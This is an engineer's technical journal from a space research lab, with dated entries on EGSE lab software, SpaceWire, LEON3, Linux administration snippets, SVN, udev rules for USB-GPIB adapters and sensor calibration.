Journal

2011-03-03 SAFARI software and hardware setup

Below is a basic setup of our software and electronics.

SAFARI setup software and electronics

We have two PCs, one with our Generic EGSE software and the other with a daemon (which collects data). To give you an idea, the Generic EGSE looks as follows:

EGSE Server.png

The daemon just receives data on an optical ethernet port in raw ethernet frames, then concatenates the packages and transfers them over TCP to the EGSE server.

The reason we use a separate PC for the daemon, is that the EGSE server cannot natively receive data over raw ethernet. Thus we use a daemon for that and the data rate is too high to run both daemon and server on one PC.

The demux is short for 'demultiplexer board', an electronics board:

demux.jpg

This board retrieves the science data from the sensor and then decimates it. There are two filters available for that. Still, the amount of data is considerable. An ethernet frame can contain 1500 bytes of data. Since one sample of the sensor is two bytes, we put 730 samples in one CCSDS packet so it fits into one ethernet frame. A good sampling should take 100,000 samples. This is rather a lot of packets so you'd say this could easily be fitted into jumbo frames. However, the demux board firmware doesn't support jumbo frames. So we concatenate the CCSDS packets on the PC with the ethernet daemon, then transfer them over TCP to the EGSE Server.

2011-03-03 From which host am I logged in

A previous entry documented on how to change your settings in bashrc, according to from which host you logged in over SSH.

The solution used the hostname entry from the "who"> command. Thing is, it didn't work well because the "who" command also outputs any X sessions.

Here is a script snippet that uses the "host" command. Be sure you install this (under Debian and derivatives available with package dns-utils).

  FROM_IP=$(echo $SSH_CLIENT | cut -f1 -d" " | grep -v ":0")
  FROM=$(host -t ptr $FROM_IP | cut -d" " -f5)
  case $FROM in
    myhostname*)
      # Enter your settings here
      set -o vi
      ;;
    otherhostname*)
      # Enter your settings here
      set -o vi
      ;;
    mylaptop*|worklaptop*)
      # Enter your settings here
      set -o vi
      ;;
  esac

The stars behind the hostnames are there to ignore the domain name. This is because FROM=... line will give you the hostname including domain name, for instance, "mylaptop.company.com."

If you want to strip off everything but the hostname, use something like

  FROM=$(host -t ptr $FROM_IP | cut -d" " -f5 | cut -d"." -f1)

2010-12-25 Google Chrome extensions I cannot live without

In the vein of the previous post; a list of Google Chrome extensions that are very useful:

And if you have a Kindle, this extension is excellent as well:

  • Send to Kindle, sends a webpage correctly formatted to the Kindle via the special e-mail address you got from Amazon

Or as an alternative:

2010-12-19 Firefox extensions I can not live without

Everybody has them: Firefox extensions they can't live without. At least, that one percent of the world population that has a PC, and then a tiny percentage of that to care about Firefox extensions.

Without further ado, here's my list:

  • Adblock Plus
  • Flashblock
  • Speed Dial
  • Last tab close button
  • Default Full Zoom Level

2010-12-06 Installing OpenOffice in a home directory

To install OpenOffice in a home directory on Debian, take the following steps:

Download the tarball with .deb packages from OpenOffice.org

Unpack it in your home directory:

  $ tar xfz OOo_3.2.1_Linux_x86_install-deb_en-US.tar.gz

Change into the directory with the .deb packages:

  $ cd OOO320_m18_native_packed-1_en-US.9502/DEBS

Unpack these to your home directory with:

  $ dpkg -x ~

You'll now have a new subdirectory named 'opt' in your home directory. All executables are in the ~/opt/openoffice.org3/program subdirectory. Add it to your path to easily run OpenOffice, or create custom icons in your Gnome panel (or other favorite desktop environment).

2010-11-26 From which host am I logged in

Sometimes you want to adjust your settings in bashrc, depending from which host you are logging in from. The who command reveals the host, and then we use cut (from GNU coreutils) to get the correct field.

  FROM=$(who | grep `whoami` | cut -f2 -d"(")
  case $FROM in
    chara*)
      # Enter your settings here
      set -o vi
      ;;
  esac

Useful for those shared accounts, who no IT department seems to admit using, but which are mightily useful sometimes!

2010-10-14 Some highlights of AHS 2010

A colleague of mine recently went to AHS 2010, a series of annual conferences organized by NASA, ESA and the University of Edinburough. Topics are on-chip learning, on-the-fly reconfigurable FPGAs, et cetera. This year, the conference took place in Anaheim, California, USA (Sough of LA).

Some points from my colleague's presentation:

  • One keynote displayed the heat in watts dissipated per square centimeter of chip. Currently, low-power multicore chips are being developed for usage in for example mobile phones. To lower power usage, chips are now divided in layers where the top layer can use optics to form a network that transports data between the multiple cores.
  • GSFC is doing a concept study for the Joint Dark Energy Mission, where the challenges are similar to what SRON has encountered during development of the control/readout electronics for the KID detectors, but these detectors work at lower temperatures than what their concept study is using.
  • JPL has developed the iBoard, a digital data acquisition platform for quick prototyping. It's however also flight ready. Based on the Xilinx Virtex 5.
  • William Zheng, also from JPL, gave an overview of the benefits and challenges of wireless intra-spacecraft communications. There are a lot of possibilities, but mentioned was that no roadmap is in place, which shows how a flight development and/or qualitication track looks like.

2010-10-12 Supporting Python

At my dayjob, we have created an application for sensor readout and control. We are creating a software design to support Python for scripting, analysis and plotting, besides the already present combo of Perl for scripting and IDL for analysis.

The list of steps comes down to:

  1. User defines a script
  2. User defines a plot
  3. User kicks off a Perl script that retrieves data
  4. Certain data triggers an IDL script in the EGSE server
  5. After the IDL script has ran (if you want to plot analyzed data), it calls a glue function so the EGSE server plots something
  6. Sometimes the Perl script requests the results as well

What we really want is that all of this happens in Python:

  1. User defines a plot
  2. Python script retrieves data
  3. Python script sends data to plot, which is maintained by a running Python process

The problem here is that the old situation allows for configuration of plots in advance. The disadvantage is that this needs a bunch of glue code, and doesn't allow for version control. The advantage is these are defined in a graphical way, and doesn't need any scripting.

2010-10-08 SpaceWire at SRON

The purpose of SpaceWire (short: SpWi), is a standard to connect pieces of a satellite for data retrieval and control. The speed is 2 to max. 400 MBit/s. The missions SWIFT and the Lunar Reconnaissance Orbiter use SpaceWire.

SpaceWire Lab Cables.jpg (Image courtesy of STAR-Dundee)

The signal is sent using LVDS, low voltage differential signalling. It's a full duplex line, with two pairs each way. The standard defines the cabling in about eight pages.

The encoding is done using Data Strobe Encoding. Tx and Rx do not share a common clock. The advantage is that you're resistant against clock skew. The disadvantage is that you now have two frequency domains in your FPGA.

There are four- and ten-bit tokens where the first bit is a parity bit and the second is the indicator for the token length. The four bit tokens are for control purposes, and there are four possible tokens. Notice there is no defined packet content; nor is there a defined length. In OSI terms, SpaceWire describes the physical and datalink layer.

An active SpaceWire link is never silent, between data the transmitter sends NULL codes. These can also be sent between the bytes of a packet. The standard also defines a time code, a special data packet for time sync purposes. The contents are not defined in the standard. This packet gets priority above data so you can send it anytime (yes, even right in a packet). For flow control, the receiver sends flow control tokens (FCT) to the data sender. For each token you can send eight characters. These can be send ahead. The FCT is one of the four control tokens. For link management, a handshake is defined. For parity errors there is no retry mechanism.

Although SpaceWire is point to point, it's possible to create networks; you then stick the packet route (the path) in address bytes in front of packets, and like the old Internet bang addresses, these are removed by each router at each step. Thus routing is simple and defined on a relatively low level.

Since there are basically two types of data you'd want to send (sensor and housekeeping data), there are two protocols. RMAP, remote memory access protocol, is most useful for housekeeping purposes. STP (Streaming Transport Protocol) is better for sensor data. In the past, SRON used CCSDS where now RMAP is used in SpWi. STP is meant for bulk transfers. The packet overhead is lower than with RMAP because the stream is first set up, then explicitly closed when necessary.

SRON has set up a test project for which the purpose was: Two SpWi ports, proper Linux driver and 8 MByte/s sustained data throughput via a PCI card. We've tried boards from Aurelia and STAR-Dundee. There are also boards from 4Links and Dynamic Engineering. The Linux as well as the Windows drivers were unable to get the required speed.

SRON has also looked into a SpaceWire IP core which had to be vendor independent (Actel and Xilinx), implemented as an AMBA interface (for inclusion in a LEON core) and available in VHDL (not just a netlist). And reasonably priced. ESA has this available.

In a test setup with a PCI card and an Actel board, we could get up to 6 MByte/s due to a slow Linux driver. Yes, that's 6 megabyte of data per second. A better solution was to put in an intermediary board with a LEON core that translated to Gigabit Ethernet.

There is also a SpaceWire Light IP core via the OpenCores project.

2010-10-05 Ubuntu on an old machine

If you want to use Ubuntu on an older PC, then memory might be tight. I recently got a HP/Compaq 7100dc which only has 512 MB memory, and will be used for light surfing plus web based e-mail. It does not have an attached printer.

The following command removes a number of services which are superfluous in the above situation:

 $ sudo apt-get remove bluez brltty pcmciautils speech-dispatcher \
    apport cups system-config-printer-gnome evolution

Explanation: this removes support for braille input devices, BlueTooth, laptop extension cards (PCMCIA), text-to-speech, crash reporting (to Ubuntu), printing and the memory hungry e-mail/calendar client Evolution.

If you are knowledgable about security, you can make the decision to remove AppArmor. More information here: AppArmor in Ubuntu.

 $ sudo apt-get remove apparmor

Also, on such a machine it is wise to turn off all visual effects by going to menu System, Preferences, Appearance. Switch to the tab Visual Effects and select None, then click Close. Explanation: this switches your window manager from Compiz to the much lighter Metacity.

The above mentioned procedure saved me 30 MB, from 125 MB used memory to 95. To find more memory-hungry processes, take the following procedure. First, find a process:

 $ ps -e -o rss,vsz,cmd --sort=rss | sort -n -r | head

Then find the path to the process:

 $ whereis <processname>

If you have a path, find the corresponding package:

 $ dpkg-query -S /path/to/programname

Then find out if you really need this package:

 $ dpkg -s <packagename>

If you don't need it, you can remove it:

 $ sudo apt-get remove <packagename>

2010-09-23 From Perl to Python

At work, we are currently using Perl and IDL, alongside our (in C++ written) EGSE server software. For the controlling of electronics, we use Perl. For the visualization of the electronics readouts, we use IDL.

For different reasons, we are looking to replace both parts with Python equivalents. This involves both a port of the software as well as a migration path. It also offers the chance to do a clean, object-oriented rewrite which could mirror the C++ libraries.

Perl basically provides scripted control/readout of sensor equipment. These scripts can be edited and run from within the EGSE, but they can also be run from the commandline.

IDL, however is more tightly integrated with the EGSE. It is compiled along with the EGSE. It listens to data requests and these are analyzed and then plotted as well as transported back to the controlling Perl script.

Besides plots by IDL, it's also possible to create plots with the EGSE software itself. We have to look in what way we want to let these co-exist with the Python plotting facilities.

We will create a design document where we look at the following items:

  • How the Perl control/readout libraries will be ported to Python
  • Which plots are present in the EGSE, and what we will do with them
  • Where the Python scripts will run
  • Where the Python plots will display
  • What current problems must be fixed

2010-08-30 How to recover from unexpected reboots

It's pretty interesting to dive into the situation of recovering from unexpected reboots. Our usual lab setup consists of three parts:

  • The PC running our Generic EGSE software: a user interface for powering, controlling and reading out a sensor
  • The so-called Controller board, an off-the-shelf board from Pender Electronics, running our embedded software
  • A project-specific electronics board with one or more DACs and/or ADCs to bias and control the sensor equipment, hereafter called the biasing board.

DBSsetup.png

Any of these could suffer unexpected power loss and subsequent power restore. The basic question is: what do we handle in the way of recovery?

For lots of things, it's necessary to maintain status. An example is the following: you are a scientist and use the above setup to set up and test your sensor. You leave the lab but then the PC unexpectedly reboots because a system administrator mistakenly remotely rebooted the PC.

When the EGSE software automatically starts again, should it attempt to initialize the biasing board? Probably not -- you may be running a test and the sensor settings should not be changed.

But then again, there is the situation of an expected power-up. You want to differentiate between the two, if you want your electronics to always be initialized upon normal startup.

Now there's complexity: both the EGSE and the Controller board will have to maintain state. Any discrepancies will have to be resolved between the two. In the end, it might be much simpler to just say that we do not support automatic initialization when the Controller board comes online.

Choices, choices...

2010-08-24 Thoughts on a software design part 2

When asking for some criticism from a colleague today, I got some additional pointers and ideas on my design sketch. Some concepts were implicit, but would be more clear when mentioned specifically:

  • The board running the embedded software (ESW) actually functions as a controller for the rack. Thus, call it the Controller.
  • The slot object (more on that later).

The Controller board will carry state for the equipment that's in the rack, but since a (possibly accidental) power-down of the rack would lose state, the previously mentioned discovery mechanism still has to be created.

The software will also get a lot more simpler if we assume there is some intelligence in the rack. Thus, we can assume that a future rack will perform the following functions:

  • Sends a signal to the Controller board telling a board has been inserted in a certain slot;
  • Can cut the power of a specific slot.

He also pointed out it's worth thinking about whether we must model the rack functions itself, perhaps as a class called RackDriver. The slots in the rack were previously left out of the model, because they did not have any meaning for the software. This now changes, since we assume the rack has some intelligence.

2010-08-17 Thoughts on a SW design

So far, the custom software we built at SRON assumed that users would manually configure the software when any hardware was replaced, and that there was only one electronics board present. The following is a preliminary design on the software changes required to support an array of boards that is placed in a standard format rack.

Overview

The basis is, that we are developing standard electronics boards for certain tasks. For instance, a standard design for an electronics card that contains a DAC and an ADC. These cards must work in array-like structures, for instance a standard 19 inch subrack which contains a number of these standard electronics boards. This could be used door biasing a sensor, reading out a sensor, housekeeping duties and PC communication duties. Such a rack would consist of a number of slots, each which consist of a rail that guides an inserted board to the backplane. This backplane provides power and connection to the software. The central requirement is: the user should be able to add and remove the boards without complex procedures. Any procedures like board-specific power-up/power-down sequences should be handled automatically.

The setup thus consists of two parts:

  • The hardware consisting of:
    • A rack with electronics boards
    • An off-the-shelf, generic electronics board with an LEON-based FPGA core (made by Pender Electronics)
  • The software consisting of:
    • The PC which runs the EGSE software (Electronic Ground Support Equipment)
    • The LEON core running ESW (our embedded software).

Use cases

To support the above sketched requirements, we can recognize several use cases in this setup:

  • Adding, removing or replacing a board
  • Powering up/down the rack (planned or unexpectedly)
  • Powering up/down the software (planned or unexpectedly)

Use case: adding, removing or replacing a board

The user must be able to add or remove a board into the rack, and the software should detect this. Also, most boards must be initialized in some way. Thus there must be hooks that run a particular script when hardware changes. This also means that the hardware must actively identify itself, let the script take care of this, or give the software some uniform way of checking this. More on this later.

Replacing, or the moving of a board from one slot to another can be covered by a simple remove/add action.

Use case: powering up a rack

Since the hardware and software can be powered on and off independently, both situations must be covered. Thus the software must have some sort of discovery mechanism when starting. The hardware must have some way of rate limiting if it actively advertises the adding or removing of a board. More on this later.

Powering down a rack

There are two possible ways in which a rack is powered down: expectedly and unexpectedly. The software does not need to be adapted either way. In the case of an expected power down, there should be a project-specific power down script. In the case of an unexpected power down, it should be determined whether the project needs a way of detecting this.

Powering up the software

When the EGSE is powered up, it should see whether a rack is connected and if so, a discovery mechanism should see what boards are present. More on the discovery mechanism later. When the ESW is powered up, no particular actions are necessary.

Powering down the software

There are two possible ways in which the EGSE is powered down: expectedly and unexpectedly. The software does not need to be adapted either way. In the case of an expected power down, there should be a project-specific power down script. In the case of an unexpected power down, it should be determined whether the project needs a way of detecting this.

The ESW can also be powered down, either accidental or as per request. There is no difference between the two, since the ESW functions as a pass-through and does not maintain state.

Objects and attributes

For the above use cases, the software obviously requires a constant and up to date register of all available boards plus their addresses. The following objects can be found in the use cases: rack, slot, board. A rack is divided in slots. A slot contains a board. Typically, racks can have shelves but for now, we assume that there's only one shelf. Also, racks are contained in a cabinet but again, there can be only one rack for now.

The current requirements do not necessitate that the software exactly knows which slots are occupied. Thus, this concept is currently not taken into account. That leaves us with the following classes:

  • Rack, with attributes: boards.
  • Board, with attributes: version, address and insertion script.

Addresses and discovery

There are two options for addressing. Currently, all boards have an address pre-programmed into the FPGA. This is fine in a situation where we can manually increment the unique address. The software will then simply use a discovery mechanism where a dummy request is sent to each possible address. When a reply is received, the board is then added to the present board list. Discovery must be quick since it inhibits other usage of the bus, and is done periodically. Thus the most logical place to run the discovery, is probably the ESW.

But when using multiple off-the-shelf boards, it is much easier to let the boards actively know that they were inserted, and let the software hand out addresses. The software still needs a discovery mechanism in case the software is brought down for some reason. This can be the same as previously mentioned.

Releases

In the first release:

  • We will let the software poll the hardware chain, and thus detect when hardware has been inserted or removed.
  • Boards will use pre-programmed addresses.
  • The concept of slots is not necessary.

For version two, we see the following points:

  • Inserted boards actively trigger a signal that notifies the software. This is currently not incorporated into the protocol that we use for communication between hardware and software. The hardware must have a way of rate limiting its active signal, perhaps by waiting for a random time.
  • After a board is inserted, the software will issue an address that uniquely identifies the board. The board will then start listening only to that address.

For version three, we see the following points:

  • Introduction of the concept of slots into the software and hardware. When (or better: before) a board is removed from the rack, a signal is sent to the software.

Unresolved points

  1. Above, it is assumed that the embedded software runs on a LEON3-based board that's directly connected to the backplane of the rack. Is this assumption correct?
  2. The current bus protocol is not really fast (2 MHz), is this fast enough to support a number of measurement boards?
  3. Do we need to detect when the rack is powered down immediately? Or is it OK to wait for the next action (user or scripted) to generate a communication timeout?
  4. It should be possible for selected boards to be powered down or reset from the software. However, since in the current backplane design one power line is provided for all boards, this does not seem possible right now.

Miscellaneous notes

  1. Some boards are high enough to occupy multiple slots, for instance when the board has a high speed FPGA which has a heat sink stuck on it. But for now, we ignore this. The software does not need to know that some slots appear empty but are actually physically blocked from usage.
  2. If a board is in the middle of a measurement, can it answer the discovery mechanism in the standard hardware design?

2010-07-20 Coverity demo

We got a demo from the Coverity people. We ran their tool on our code base in advance. Via a WebEx session we got an explanation of the results, but first we got an overview of the company and their projects since some of the team were new to this stuff.

It's a pretty young company, founded less than ten years ago, and their aim is to deliver products that improve the quality of your software. Clients are in the medical and aerospace branche. Wikipedia article on Coverity. They have a 1000+ customers.

From the webbased Integrity Center software, several tools can be controlled. One of them is Static Analysis, called the Prevent tool. The tool identifies critical problems, not the more trivial things like style compliance etcetera.

Since bugs are cheaper to fix in development rather than in the field, this gives the user time and cost savings.

The software checks the compiler calls that are made when you do a build (via make) and then works on the code in the same way. It's not a replacement for unit tests. After running, a database of the results is written and there is a web frontend where you can read out the database.

The screen shows a number of defects, with filter options at the left. When clicking on a defect, you can see the code as well as th classification of the defect. Along with the classification, there is a short explanation of this type of issue. Clicking further will also give simple examples so you better understand the defect.

Each defect can be assigned to a certain team member. We have already invested in using Traq so I'm not so sure that's useful.

We had questions about finding concurrency problems. Coverity can help with this but they support pthread it of the box. Since we use QThreads, we should make a model for that library. However since we have the code available (Qt is open souce) and it's using PThreads, it's not a problem and Coverity will be able to pick it up automatically.

Besides the existing checks, it's possible to add your own checks. Perhaps you want to enforce a certain way in which you use an external library.

The software tries to be smart. For example sometimes you do some smart coding which usually triggers an error. Coverity will use heuristics and not report it if the rest of the code base shows that this is not something worth reporting.

We closed off the demo with a discussion on licensing. The account manager teams up with a technical consultant and together they pretty extensively work on the requirements and resulting cost savings. From that, the price is derived. There are other licensing models however.

2010-07-15 Sending email from a Perl script

If you're on Debian or Ubuntu Linux and you want to send a quick e-mail from a Perl script, use the Email::Send module (this module has been superceded by the Email::Sender module, but that one doesn't seem to be present in the Debian Stable package repository yet).

First, install the appropriate packages:

 $ sudo apt-get install libemail-send-perl

Then use the following snippet:

 use Email::Send;
 my $message = <<'__MESSAGE__';
 To: bartvk@example.com
 From: bartvk@example.com
 Subject: This is a mail from a Perl script
 This is the body of an e-mail from a perlscript
 __MESSAGE__
 my $sender = Email::Send->new({mailer => 'Sendmail'});
 $sender->send($message);

Now go and use this wisely, my young padawan. Some observations:

  1. You rely on Sendmail being present
  2. You trust all input variables
  3. You are not using HTML, attachments, or what have you

2010-01-17 Calibrate good times

We have a DT-470 temperature sensor in the cryostat of the project I'm currently working on. The problem is that our software is displaying the wrong readout. I'm trying to figure out how to display the correct value in Kelvin.

I've got the following to work with:

  • The cryostat is filled with liquid nitrogen, which we know is around 77 K.
  • The sensor was also read out when the cryostat was not cooled, so we have a combination of raw value (as read from electronics) and known temperature as well (room temperature, 20 degrees Celsius, is about 293 K).
  • We've been provided with a data sheet from which a polynomial can be derived.
  • The spec says we need to drive the sensor with a 10uA current, but in actuality, we drive it with a 12.368 uA current. I'm told this is not a big deal, because the difference in current is unlikely to cause a difference in warmth.
  • The spec also gives us a lookup table to transform raw value to Kelvins
  • Because of the way the sensor is read out, we need to apply an additional offset and factor (our electronics influence/amplify the readout).
  • The sensor readout is linear for the range from 10 to 200 K, then follows a curve to 0 K.

The software has the ability to apply a polynomial to a raw value (i.e. a value that's read out from the electronics), as well as apply a user-configurable function to a value. That is usually used for convenience like electronics giving us a negative value, when we'd rather receive a positive value.

In this case, the polynomial is applied to correct the value for the way our electronics influence the raw value. Then, the user-configurable function is applied, which in this case is the polynomial that follows from the data sheet.

So the steps are:

  • Remove the electronics and drive the sensor manually. Do we get the same value (raw) as we get from the electronics?
  • Get the raw value, and see whether our first polynomial is OK (the first polynomial is a simple one, just an offset plus a factor). We can do this by looking up the raw value in the lookup table.
  • Use that in-between value and check the lookup table to see whether the second polynomial is OK.
  • The heating of the electronics board could also play a role, we need to check that as well and if so, correct the first polynomial.

2009-12-09 Installing Linux Google Chrome as a regular user

Early december 2009, Google launched the beta version of the Chrome browser for Linux. They provide RPM and Deb packages, allowing for easy installation.

Sometimes however, you're working on a Linux PC where you do not have root access. The following procedure allows you to install and run Chrome as a normal user:

  • Download the .deb package and save it into your home directory
  • Unpack it into a subdirectory called Chrome with the following command:
 $ dpkg -x google-chrome-beta_current_i386.deb Chrome
  • To easily start up the app, create a launcher icon. Here is a good tutorial on adding a launcher to a panel. In the name field, type Chrome. In the command field, type /home/yourusername/Chrome/opt/google/chrome/google-chrome. Click the icon, and go to Chrome/opt/google/chrome to find the icons there.

2009-12-02 Who is logging in

Who is logging into my Linux workstation?

At my most regular workplace (I have several), I have a Debian Linux workstation. The username/password information is managed over NIS, and is configured such, that every user can log into every workstation.

I have no problem with this, but do like to know who is logging in when I'm using the desktop. Thus at startup, I run the following script in the background:

  #!/bin/sh
  [ ! -e /usr/bin/whoami ] && exit 1
  [ ! -e /usr/bin/gmessage ] && exit 1
  while [ 1 ]
  do
    LOGINNAME=`w  -h | cut -f1 -d' ' | grep -v whoami`
    if [ $LOGINNAME ]; then
      gmessage "User $LOGINNAME logged in" -button OK
    else
      sleep 1
    fi
  done

Save this script somewhere in your home directory. I've called it 'loginwatch'. Then make it executable and run it in the background as follows:

 $ chmod +x loginwatch
 $ ./loginwatch &

This script assumes that you use the Gnome desktop, because it uses the gmessage utility.

2009-10-19 Rolling back a change

Suppose you inadvertently made changes in some files some time back. You can examine revisions of files with

 $ svn log ccsds.h

You see that the previous revision was 205 and that it was correct. With an SVN merge, you can make that old revision the current revision:

 $ svn merge -r HEAD:205 ccsds.h

Check in your file and you're done!

2009-08-28 PHP client using Thrift

Today I was thinking about a PHP script that uses Thrift to retrieve a couple of results. We have the following Thrift definition:

 /* This contains the three things identifying a logging program */
 struct Logger {
     1:  string      userName,
     2:  string      hostName,
     3:  string      appName
 }
 /* This is a debug message */
 struct Message {
     1:  Logger      origin,
     2:  string      content
 }
 /* This defines the remote logging services */
 service RemoteLog {
     // send a log message to the logserver
     oneway void         newMessage      (1:Message aMessage)
    
     // get list of loggers available
     list<Logger>        getLoggers      ()
    
     // get messages from a specific logger
     list<Message>       getMessages     (1:Logger aLogger, 2:i32 aFromID, 3:i32 aMax)
 }

However, I'd then have to implement the reverse of the above description. In other words, I am asking the remote logging service for whatever he has received over time. To get this up and running, the following steps have to be taken:

  1. Define Thrift definition
  2. Generate PHP stubs (client side)
  3. Rework these into script
  4. Generate C++ stubs (server side)

2009-08-24 Archiving to a branch

Today, I needed to archive and clean up old machines that were used for a project that has reached its end-of-life. These PCs were used in a laboratory setup, controlling custom electronics.

We run our custom lab software on those PCs and the installation is done by checking out a copy of the source, and doing a local compile. Problem is that these machines have been off the network for a while and some local modifications were necessary. While cleaning up, I found that these modifications were not committed to the SVN repository.

In the meantime however, we worked hard on the software and now I cannot just do an update and commit these old modifications. The solution is to create a branch and commit the changes to that branch.

First, find out what the local version is:

 $ svnversion .
 1143:1150M

We'll make a branch of revision 1150 first. Then we'll check out that branch in another directory:

 $ mkdir ~/tmp
 $ cd ~/tmp
 $ svn copy -r 1150 http://repository.example.com/svn/our_software/trunk \
   http://repository.example.com/svn/our_software/branch-project-pc0054
 Committed revision 2011.
 $ svn co http://repository.example.com/svn/our_software/branch-project-pc0054
 Checked out revision 2011.

Then we'll go to the local copy that was running all the time on this PC, and create a patch of the local version:

 $ cd ~/sw
 $ svn diff > ~/hackwork.patch

Go back to the directory with the newly created branch. Apply that patch to the branch, then commit.

 $ cd ~/tmp/our_software/branch-project-pc0054
 $ patch -p 0 < ~/hackwork.patch
 $ svn ci -m "Archiving local modifications"
 Committed revision 2012.

2009-06-08 Using D-Bus in your application

We've got a Qt-based application (daemon style) which writes log files. In order to nicely integrate the app into our Linux environment, the daemon should be able to receive a signal that it needs to close off its log files and start writing a new one.

Rotating logs is done by placing a small instructive text file in /etc/logrotate.d and by adding the possibility to the daemon to receive a signal of some sort.

The old school way is using plain old Signals but these interrupt system calls. We do not want that to happen; the daemons run in a lab environment and such an interruption could disturb a measurement.

The new style is using D-Bus for this stuff.

2009-06-06 Getting Chrome running on Fedora

Recently, the alpha builds of Chrome for Linux became available. Unfortunately, only Debian and Ubuntu packages were released.

To get Chrome running under Fedora 10, take the following steps:

Download the chrome .deb file

Create a temporary directory in your home dir:

 $ mkdir ~/blah

Unpack the .deb file there:

 $ cd ~/blah
 $ ar x ~/Download/chrome*deb

Unpack the binary code:

 $ tar xfz data.tar.gz

Move the binaries to your /opt

 $ mv opt/* /opt

Now create a couple of symlinks in /lib so Chrome can find all the necessary libraries (apparently these are named differently under Debian and Ubuntu):

 $ cd /usr
 $ sudo ln -s libnss3.so libnss3.so.1d
 $ sudo ln -s libnssutil3.so.1d libnssutil3.so
 $ sudo ln -s libnssutil3.so libnssutil3.so.1d
 $ sudo ln -s libsmime3.so libsmime3.so.1d
 $ sudo ln -s libssl3.so libssl3.so.1d
 $ sudo ln -s libplds4.so libplds4.so.0d
 $ sudo ln -s libplc4.so libplc4.so.0d
 $ sudo ln -s libnspr4.so libnspr4.so.0d

Now chrome can be started:

 $ /opt/google/chrome/google-chrome

Create an application launcher on any panel for easy access.

2009-03-27 LEON3

At work, we're currently experimenting with the LEON3 processor. It's an open chip design that contains a general CPU and has buses for several applications. It's possible to design your own logic for controlling custom electronics, and then use the bus to connect your logic to the CPU.

On that CPU, you can just run Linux and with a driver you can read out your custom logic. The LEON3 CPU core has a SPARC instruction set, making it perfect for running Linux. The SPARC instruction set is a bit of a loner when it comes to embedded OSes though -- the ARM architecture is much better supported. But there you go.

The LEON3 is an alternative for an FPGA that's connected with a serial port or somesuch to a full-blown PC. It also makes it possible to move a lot of logic from the FPGA to C or C++ code. Although arguably you lose on simplicity (there's now a full OS running on the LEON core), you gain on flexibility because of the fluidity of software as opposed to an FPGA.

2008-12-19 Linux USB device handling

For reading/operating lab instruments like multimeters and power supplies, the GPIB standard is used. This standard defines the type of cabling and connection.

However nowadays the interface cards for this type of card are awkward to get and are replaced by an USB-based GPIB adapter like this one:

http://sine.ni.com/images/products/us/050318_gpib_usb_l.jpg

In this weblog entry, I'm going to explain the situation where you have a Linux machine and a USB device, but as an application developer you don't know how to continue from here. This is all explained using a USB-based GPIB adapter.

These particular devices are handled on Linux using the default gpib_common.ko kernel module and a device-specific driver which the manufacturer distributes (in this case the ni_usb_gpib.ko module).

However that's not the end of it. When the device is plugged in, it has to be connected to a device file like /dev/gpib0. This is done by loading the modules, loading the firmware (with some particular devices), running the gpib_config utility and setting the correct permissions on the device file.

We want this done automatically on our Debian machines. We already have compiled and repackaged the gpib_common.ko and ni_usb_gpib.ko modules, and have installed these.

First we need to know if the module will be loaded when we connect the device. The kernel handles loading appropriate modules by calling modprobe. Typing the following command can tell you whether modprobe knows what to do when such a device is connected. Replace the 'grep gpib' with 'less' if you don't know what string you're looking for.

 $ modprobe -c | grep gpib

If that's fine, then connecting the device should load the modules. Type the following command to check this, again replacing the 'grep gpib' with something more appropriate:

 $ lsmod | grep gpib

Connect the device and check for changes. If a device driver is loaded, then a udev rule should be written. If not, re-examine the output of the modprobe -c command. An example extract:

 $  modprobe -c | grep gpib
 ...
 alias usb:v3923p702Ad*dc*dsc*dp*ic*isc*ip* ni_usb_gpib
 alias usb:v3923p709Bd*dc*dsc*dp*ic*isc*ip* ni_usb_gpib
 ...

Observing one of those lines a bit closer:

 alias usb:v3923p702Ad*dc*dsc*dp*ic*isc*ip* ni_usb_gpib
            ^^^^ ^^^^
 The vendor ID    The product ID

In my case, no driver got loaded, because the vendor and product numbers that are outputted by modprobe don't match with the USB device its vendor and product number.

To see what the vendor and product numbers of the USB device are, type:

 $ lsusb
 ...
 Bus 007 Device 003: ID 3923:702b National Instruments Corp.
 ...

Check the string 1234:5678 just before the name of the device. The first part is the vendor number, the second part is the product number, both hexadecimal. As you can see, in this case the vendor number matches, but not the product number.

Add a new file in /etc/modprobe.d and then add a line in there which looks like the lines in the existing modprobe configuration. Adapt the vendor and product numbers as necessary. Then type lsmod and connect your device. Type lsmod again to see whether the appropriate driver loaded. If not, did you make a typo in the vendor or product numbers?

Now that the driver is loaded, we go on to writing udev rules. Check the Writing udev rules document for this.

Some tips for writing udev rules follow.

First you find the device details using:

 $ find /sys -name dev  | grep usb

Find the device its path in /sys and use it with udevinfo. Note that some devices require firmware to be loaded. udevinfo then will not show a lot of information. The device must then be identified purely by its product and vendor ID.

 $ udevinfo -a -p /sys/class/usb_device/usbdev2.18/dev

Before you plug/unplug the device, run the udev monitor to see what events are fired off:

 $ udevmonitor

To test whether your rule fires off, use logger in your udev rule:

 SUBSYSTEM=="usb", DRIVERS=="usb", ATTRS{idVendor}=="3923",
   ATTRS{idProduct}=="709b", ACTION=="add",
   RUN+="/usr/bin/logger My rule fires off!"

Note that the above line is actually ONE line, without any linefeeds except at the end.

When you want to load firmware upon connecting the USB device, you might need to pass the location of the device to the firmware loader. It's possible to use the value of sysfs attributes in your RUN or PROGRAM part of the udev rule:

 SUBSYSTEM=="usb", DRIVERS=="usb", ATTRS{idVendor}=="3923",
   ATTRS{idProduct}=="702b", ACTION=="add",
   RUN+="/usr/bin/logger Running /usr/sbin/gpib_config for device
   USB-GPIB-B on bus %s{busnum}, device %s{devnum}"

The %s{...} is substituted for a particular sysfs attribute its value.

2008-12-09 Offset dependency

Previous year, I wrote about the Fiske steps routine, a routine which automatically searches for an optimum sensor setting.

For this routine to work, the setting and reading back of voltages and currents has to be very precise. Thus, a 'measure offsets' routine was also developed, but it turns out this routine is going to be a bit more complicated than expected.

Here's an image of the output of the Fiske steps routine:
fiske example.png

We had a hard time today getting the routine to work nicely. The physics student told us that it has something to do with the fact that the FFO voltage depends in the first place on the FFO bias current, but also in a much lesser way on the FFO control line.

Some background about this. The sensor behaves as a resistor, thus when setting a particular FFO bias current, the resulting FFO voltage has a direct relation. This relation becomes somewhat less simple when the FFO control line is set. This control line has two influences: running a current creates a magnetic field, and because the copper line at the back of the sensor substrate acts as a resistor, a little heat is given off.

The heating makes the offset somewhat different, and should be taken into account. Also, there's timing involved; setting the FFO CL to zero after a high setting, the FFO voltage can be seen slowly dropping from near zero to zero.

2008-11-21 Temperature sensor versus PT1000

One of the tests we do on the temperature sensing ASIC is to measure the difference between the device and a PT1000.

